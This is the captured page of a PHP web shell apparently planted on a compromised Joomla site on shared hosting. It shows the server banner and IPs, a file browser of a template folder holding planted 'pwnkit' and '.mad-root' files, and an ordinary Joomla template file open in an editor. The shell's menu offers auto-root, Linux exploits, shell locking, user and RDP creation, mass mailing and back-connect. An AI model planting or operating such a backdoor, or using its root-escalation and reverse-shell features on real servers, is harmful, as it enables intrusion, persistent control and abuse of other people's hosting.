Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
templates /
bizone /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
com_blue_pagebuilder
[ DIR ]
drwxr-xr-x
com_k2
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
mod_breadcrumbs
[ DIR ]
drwxr-xr-x
mod_k2_content
[ DIR ]
drwxr-xr-x
mod_k2_tools
[ DIR ]
drwxr-xr-x
mod_menu
[ DIR ]
drwxr-xr-x
st_template
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
index.html
32
B
-rw----r--
modules.php
1.77
KB
-rw----r--
pagination.php
5.87
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modules.php
<?php /** * @package Joomla.Site * @subpackage Templates.protostar * * @copyright Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; /** * This is a file to add template specific chrome to module rendering. To use it you would * set the style attribute for the given module(s) include in your template to use the style * for each given modChrome function. * * eg. To render a module mod_test in the submenu style, you would use the following include: * <jdoc:include type="module" name="test" style="submenu" /> * * This gives template designers ultimate control over how modules are rendered. * * NOTICE: All chrome wrapping methods should be named: modChrome_{STYLE} and take the same * two arguments. */ /* * Module chrome for rendering the module in a submenu */ function modChrome_no($module, &$params, &$attribs) { if ($module->content) { echo $module->content; } } function modChrome_well($module, &$params, &$attribs) { if ($module->content) { echo "<div class=\"well " . htmlspecialchars($params->get('moduleclass_sfx')) . "\">"; if ($module->showtitle) { echo "<h3 class=\"page-header\">" . $module->title . "</h3>"; } echo $module->content; echo "</div>"; } } function modChrome_widget($module, &$params, &$attribs) { if ($module->content) { echo "<div class=\"widget " . htmlspecialchars($params->get('moduleclass_sfx')) . "\">"; if ($module->showtitle) { echo "<div class='widget-title ". htmlspecialchars($params->get('moduleclass_sfx')) ."'><h4>" . $module->title . "</h4></div>"; } echo $module->content; echo "</div>"; } } ?>
Close